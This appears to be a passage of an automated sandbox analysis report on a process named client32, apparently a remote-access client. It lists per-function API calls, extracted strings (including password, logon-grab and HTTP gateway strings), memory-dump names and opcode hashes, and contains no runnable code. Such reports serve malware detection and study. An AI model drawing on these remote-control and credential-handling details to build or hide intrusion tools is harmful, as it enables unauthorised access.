API ID: _strncmp
String ID: %02x %02x$%s$3'$CMD=NC_DATA$Error %d sending HTTP request on connection %d$Error %d writing inet request on connection %d$Error send returned 0 on connection %d$NC_DATA$SendHttpReq failed, not connected to gateway!$abort send, gateway hungup$xx %02x
API String ID: 909875538-2848211065
Opcode ID: 878432efe4fcc05655c319d9f3c856f2560be5e1840c7557088b5f293b8e6190
Instruction ID: add3f7f1d6296298d2e70f7cc55a50a2903557960c601647f3fd4484b00c9649
Opcode Fuzzy Hash: 878432efe4fcc05655c319d9f3c856f2560be5e1840c7557088b5f293b8e6190
Instruction Fuzzy Hash: 86D1D575A042199FDB20CF64D8C4BEDB7B4AF4A328F8440AAD91D9B242F73199C9CF51

Function 11028290 Relevance: 42.5, APIs: 2, Strings: 22, Instructions: 542
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,70371370,?,0000001A), ref: 1102837D
_strrchr.LIBCMT ref: 1102838C

Part of subcall function 11160E4E: __stricmp_l.LIBCMT ref: 11160E8B

Strings

??I, xrefs: 11028997
NSSConfName, xrefs: 110286F5
product.dat, xrefs: 11028340, 11028391
LongName, xrefs: 11028515
SupportsAndroid, xrefs: 11028822
NSSName, xrefs: 110285D5
??F, xrefs: 11028910
SupportWWW, xrefs: 11028635
TLA, xrefs: 110285A5
ShortName, xrefs: 11028545
SupportsChrome, xrefs: 11028786
TechConsole, xrefs: 110287BD
NSSTLA, xrefs: 11028605
SupportEMail, xrefs: 11028665
AssistantURL, xrefs: 11028759
NSSLongCaption, xrefs: 110287F5
NSSAppDataDir, xrefs: 110286C5
Name, xrefs: 110284DE
AssistantName, xrefs: 1102872C
Home, xrefs: 11028575
\, xrefs: 1102830C
NSMAppDataDir, xrefs: 11028695

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FileModuleName__stricmp_l_strrchr
String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
API String ID: 1609618855-357498123
Opcode ID: bffd7a72419acbf4e69006bd0d2009b0d15558627307e104a623c4426f2c4fa7
Instruction ID: 3ecfaec1c78aa64732578d28134276498dc59d4967fe96fbd16849b56c65f872
Opcode Fuzzy Hash: bffd7a72419acbf4e69006bd0d2009b0d15558627307e104a623c4426f2c4fa7
Instruction Fuzzy Hash: 0E12E33ED052A78BDB55CF24CC807D8B7F4AB1A308F4440EAE99597205EB719786CB92

Function 68C76BA0 Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 273
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 68C76BD5
GetTickCount.KERNEL32 ref: 68C76C26
Sleep.KERNEL32(00000064), ref: 68C76C5B

Part of subcall function 68C76940: GetTickCount.KERNEL32 ref: 68C76950

WaitForSingleObject.KERNEL32(000002F8,?), ref: 68C76C7C
_memmove.LIBCMT ref: 68C76C93
select.WSOCK32(00000000,?,00000000,00000000,?), ref: 68C76CB4
Sleep.KERNEL32(00000032,00000000,?,00000000,00000000,?), ref: 68C76CD9
GetTickCount.KERNEL32 ref: 68C76CEC
_calloc.LIBCMT ref: 68C76D76
GetTickCount.KERNEL32 ref: 68C76DF3
InterlockedExchange.KERNEL32(02B92F0A,00000000), ref: 68C76E01
_calloc.LIBCMT ref: 68C76E33
_memmove.LIBCMT ref: 68C76E47
InterlockedDecrement.KERNEL32(02B92EB2), ref: 68C76EC3
SetEvent.KERNEL32(00000300), ref: 68C76ECF
_memmove.LIBCMT ref: 68C76EF4
GetTickCount.KERNEL32 ref: 68C76F4F
InterlockedExchange.KERNEL32(02B92E52,-68CAA188), ref: 68C76F60

Strings

ResumeTimeout, xrefs: 68C76BBA
e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 68C76E62
ReadMessage returned FALSE. Terminating connection, xrefs: 68C76F3A
ProcessMessage returned FALSE. Terminating connection, xrefs: 68C76F25
httprecv, xrefs: 68C76BDD
FALSE, xrefs: 68C76E67

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: CountTick$Interlocked_memmove$ExchangeSleep_calloc$DecrementEventObjectSingleWaitselect
String ID: FALSE$ProcessMessage returned FALSE. Terminating connection$ReadMessage returned FALSE. Terminating connection$ResumeTimeout$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$httprecv
API String ID: 1449423504-919941520
Opcode ID: beef1bff4b9644587eabac27e3a380c420e0a209001c0dd65ede08653540c7a0
Instruction ID: 246366129470b31974f4caec7fd50129c529da76846729be4ab4196224a1200c
Opcode Fuzzy Hash: beef1bff4b9644587eabac27e3a380c420e0a209001c0dd65ede08653540c7a0
Instruction Fuzzy Hash: ABB16FB5D40258DBDB20DF64CD84BEE77B4AB49348F4040AAE659A7240E7B49AC4CF91

Function 11085840 Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 161
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?,00000001,?), ref: 110858CC
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 110858EA
LoadLibraryA.KERNEL32(?), ref: 1108592C
GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11085947
GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 1108595C
GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 1108596D
GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 1108597E
GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 1108598F
GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 110859A0

Strings

CipherServer_Create, xrefs: 11085941
CryptPak.dll, xrefs: 1108589B, 110858FE
CipherServer_GetRandomData, xrefs: 110859BC
CipherServer_DecryptBlocks, xrefs: 110859AB
CipherServer_CloseSession, xrefs: 11085989
CipherServer_GetInfoBlock, xrefs: 11085967
CipherServer_Destroy, xrefs: 11085956
CipherServer_EncryptBlocks, xrefs: 1108599A
CipherServer_OpenSession, xrefs: 11085978
CipherServer_ResetSession, xrefs: 110859CD

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$FileModuleName
String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
API String ID: 2201880244-3035937465
Opcode ID: 337901d8a57ff9f2c74122cebfcf765c1ae8331dc4db4cdad0fbf418eb706ca4
Instruction ID: e9fa9a36c663d757a0c8add56282bddb088a97f97ce07886abf3270b6b50a9db
Opcode Fuzzy Hash: 337901d8a57ff9f2c74122cebfcf765c1ae8331dc4db4cdad0fbf418eb706ca4
Instruction Fuzzy Hash: C051DE70E0431AAFD710DF79C880AAAFBF8AF49304B2185AAE8D5C7244EB71E441CF51

Function 11105D40 Relevance: 33.5, APIs: 14, Strings: 5, Instructions: 213
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

OpenEventA.KERNEL32(00000002,00000000,nsm_gina_sas,00000009), ref: 11105E1A
CloseHandle.KERNEL32(00000000), ref: 11105E29
GetSystemDirectoryA.KERNEL32(?,000000F7), ref: 11105E3B
LoadLibraryA.KERNEL32(?), ref: 11105E71
GetProcAddress.KERNEL32(?,GrabKM), ref: 11105E9E
GetProcAddress.KERNEL32(?,LoggedOn), ref: 11105EB6
FreeLibrary.KERNEL32(?), ref: 11105EDB

Part of subcall function 1110C2B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,7765C3F0,00000000,?,1110D1D5,Function_0010CD70,00000001,00000000,?,?,?,000000FF), ref: 1110C2C7
Part of subcall function 1110C2B0: CreateThread.KERNEL32(00000000,1110D1D5,00000001,00000000,00000000,0000000C), ref: 1110C2EA
Part of subcall function 1110C2B0: WaitForSingleObject.KERNEL32(?,000000FF,?,1110D1D5,Function_0010CD70,00000001,00000000,?,?,?,000000FF,?,11026F57), ref: 1110C317
Part of subcall function 1110C2B0: CloseHandle.KERNEL32(?,?,1110D1D5,Function_0010CD70,00000001,00000000,?,?,?,000000FF,?,11026F57), ref: 1110C321

GetStockObject.GDI32(0000000D), ref: 11105EEF
GetObjectA.GDI32(00000000,0000003C,?), ref: 11105EFF
InitializeCriticalSection.KERNEL32(0000003C), ref: 11105F1B
InitializeCriticalSection.KERNEL32(111EC5C4), ref: 11105F26

Part of subcall function 111042A0: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11186026,000000FF), ref: 11104373
Part of subcall function 111042A0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111043C2

CloseHandle.KERNEL32(00000000,Function_000FFE60,00000001,00000000), ref: 11105F69

Part of subcall function 1109DCF0: GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F58B4,00000001,1113DE08,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DD11
Part of subcall function 1109DCF0: OpenProcessToken.ADVAPI32(00000000,?,?,110F58B4,00000001,1113DE08,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DD18
Part of subcall function 1109DCF0: CloseHandle.KERNEL32(00000000,00000000,?,?,00000002,00000000), ref: 1109DD37

CloseHandle.KERNEL32(00000000,Function_000FFE60,00000001,00000000), ref: 11105FBA
CloseHandle.KERNEL32(00000000,Function_000FFE60,00000001,00000000), ref: 1110600F

Strings

nsm_gina_sas, xrefs: 11105E04
\pcigina, xrefs: 11105E50
GrabKM, xrefs: 11105E98
LoggedOn, xrefs: 11105EB0
LPT1, xrefs: 11105DF9

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseHandle$Library$LoadObject$AddressCreateCriticalEventInitializeOpenProcProcessSection$CurrentDirectoryFreeSingleStockSystemThreadTokenWait_memsetwsprintf
String ID: GrabKM$LPT1$LoggedOn$\pcigina$nsm_gina_sas
API String ID: 539809342-403456261
Opcode ID: 5635cacc2ea566ca3e71dd3805252e4bc2cfcb6a1aaacb447e2f795ad6309a42
Instruction ID: 98d48469d2e7b61091a73167657919c28ab3cbb48a1ba220805b109c32019478
Opcode Fuzzy Hash: 5635cacc2ea566ca3e71dd3805252e4bc2cfcb6a1aaacb447e2f795ad6309a42
Instruction Fuzzy Hash: 6981B1B1E007569FDB51CFB48C89BAAFBE5BB08308F10857DE569D7280D7706A40CB12

Function 11136060 Relevance: 31.8, APIs: 12, Strings: 6, Instructions: 348windowCOMMON

Download Yara Rule

APIs

Part of subcall function 11141710: GetVersionExA.KERNEL32(111ECE98,77068400), ref: 11141740
Part of subcall function 11141710: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114177F
Part of subcall function 11141710: _memset.LIBCMT ref: 1114179D
Part of subcall function 11141710: _strncpy.LIBCMT ref: 1114186A

PostMessageA.USER32(000301CE,000006CF,00000007,00000000), ref: 1113623F

Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D

SetWindowTextA.USER32(000301CE,00000000), ref: 111362E7
IsWindowVisible.USER32(000301CE), ref: 111363AC
GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000,?,?,?,?,?), ref: 111363CC
IsWindowVisible.USER32(000301CE), ref: 111363DA
SetForegroundWindow.USER32(00000000), ref: 11136408
EnableWindow.USER32(000301CE,00000001), ref: 11136417
IsWindowVisible.USER32(000301CE), ref: 11136468
IsWindowVisible.USER32(000301CE), ref: 11136475
EnableWindow.USER32(000301CE,00000000), ref: 11136489
EnableWindow.USER32(000301CE,00000000), ref: 111363EF

Part of subcall function 1112E330: ShowWindow.USER32(000301CE,00000000,?,11136492,00000007,?,?,?,?,?,00000000,?,?,?,?,?), ref: 1112E354

EnableWindow.USER32(000301CE,00000001), ref: 1113649D

Strings

Client, xrefs: 111360E1, 1113618B, 111361C4, 11136222
ShowUIOnConnect, xrefs: 1113621D
ConnectedText, xrefs: 11136178, 11136187
LockedText, xrefs: 111361BF
ViewedText, xrefs: 1113616B
HideWhenIdle, xrefs: 111360DC

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
API String ID: 3453649892-3803836183
Opcode ID: 933d860dfa7abdf9aec1ce1cc807207ef57f020f96dc405baf31ced77d609c35
Instruction ID: e84f8c9860d0a84ca21d0dbcc5e0864e350968dbdf20df23b648977f69907e2d
Opcode Fuzzy Hash: 933d860dfa7abdf9aec1ce1cc807207ef57f020f96dc405baf31ced77d609c35
Instruction Fuzzy Hash: 02C13C75F113259BEB02DFE4CD85BAEF7A6AB8032DF104438D9159B288EB31E944C791

Function 11073B73 Relevance: 31.7, APIs: 11, Strings: 7, Instructions: 204threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(0000000C), ref: 11073B95
InitializeCriticalSection.KERNEL32(00000024), ref: 11073B9B
InitializeCriticalSection.KERNEL32(0000003C), ref: 11073BA1
InitializeCriticalSection.KERNEL32(0000DB1C), ref: 11073BAA
InitializeCriticalSection.KERNEL32(00000054), ref: 11073BB0
InitializeCriticalSection.KERNEL32(0000006C), ref: 11073BB6
_strncpy.LIBCMT ref: 11073C18
ExpandEnvironmentStringsA.KERNEL32(?,?,00000100,?,?,00000001,00000000), ref: 11073C7F
CreateThread.KERNEL32(00000000,00004000,Function_0006FD70,00000000,00000000,?), ref: 11073D1C
CloseHandle.KERNEL32(00000000,?,?,00000001,00000000), ref: 11073D23

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

tj, xrefs: 11073BEE
destroy_queue == NULL, xrefs: 11073BCB
Password, xrefs: 11073CD3
DefaultUsername, xrefs: 11073C60
General, xrefs: 11073C35, 11073C65, 11073CD8
RememberPassword, xrefs: 11073C30
..\ctl32\Connect.cpp, xrefs: 11073BC6

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection$CloseCreateEnvironmentErrorExitExpandHandleLastMessageProcessStringsThread_strncpywsprintf
String ID: ..\ctl32\Connect.cpp$DefaultUsername$General$Password$RememberPassword$destroy_queue == NULL$tj
API String ID: 2176893583-624511195
Opcode ID: b64db9be393d21858828107b08024ed2c37c646a5a2dcafe481e79fb9172f6ad
Instruction ID: 96e53a99b37afd88effbccddcb99d5044153cbf19089882f4136f072ae1633ca
Opcode Fuzzy Hash: b64db9be393d21858828107b08024ed2c37c646a5a2dcafe481e79fb9172f6ad
Instruction Fuzzy Hash: 6A71EAB1B00309AFE711DBA4CC85FE9F7B5BB88704F0084A9E3159B281EB70B944CB65

Function 11030444 Relevance: 28.4, APIs: 11, Strings: 5, Instructions: 357libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 11030450
GetProcAddress.KERNEL32(00000000), ref: 11030457
GetNativeSystemInfo.KERNEL32(?), ref: 11030465
GetStockObject.GDI32(0000000D), ref: 11030672
GetObjectA.GDI32(00000000,0000003C,?), ref: 11030682
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C0
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C6
InterlockedExchange.KERNEL32(02418D48,00001388), ref: 11030746
GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 11030778

Strings

pcicl32, xrefs: 11030851
GetNativeSystemInfo, xrefs: 11030444
kernel32.dll, xrefs: 11030449
.%d, xrefs: 11030782
Error %s unloading audiocap dll, xrefs: 1103098F

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorModeObject$AddressExchangeHandleInfoInterlockedModuleNativeProcStockSystem
String ID: .%d$Error %s unloading audiocap dll$GetNativeSystemInfo$kernel32.dll$pcicl32
API String ID: 711497182-3782231422
Opcode ID: fbf71ec49f53600c72b87a96e154c6fc632858b50e963b64517ef1cdb7f6b3f1
Instruction ID: f63cb038d00ac44cf3594e94df0c2f2de2f1e5b42f8671348dba24db1a15b590
Opcode Fuzzy Hash: fbf71ec49f53600c72b87a96e154c6fc632858b50e963b64517ef1cdb7f6b3f1
Instruction Fuzzy Hash: 59D172B0D16369DEDF02CBB48C447EDBEF5AB8430CF1001A6D849A7289F7755A84CB92

Function 110302A9 Relevance: 28.4, APIs: 9, Strings: 7, Instructions: 350registryCOMMON

Download Yara Rule

APIs

Part of subcall function 1113F670: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,77068400,?,?,111417CF,00000000,CSDVersion,00000000,00000000,?), ref: 1113F690

RegCloseKey.KERNEL32(?), ref: 110303C3
GetStockObject.GDI32(0000000D), ref: 11030672
GetObjectA.GDI32(00000000,0000003C,?), ref: 11030682
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C0
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C6
InterlockedExchange.KERNEL32(02418D48,00001388), ref: 11030746
GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 11030778

Part of subcall function 111601FD: __isdigit_l.LIBCMT ref: 11160222

Strings

3, xrefs: 110303F2
pcicl32, xrefs: 11030851
CurrentMajorVersionNumber, xrefs: 11030359
CurrentVersion, xrefs: 110302BC
.%d, xrefs: 11030782
CurrentMinorVersionNumber, xrefs: 1103038C
Error %s unloading audiocap dll, xrefs: 1103098F

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
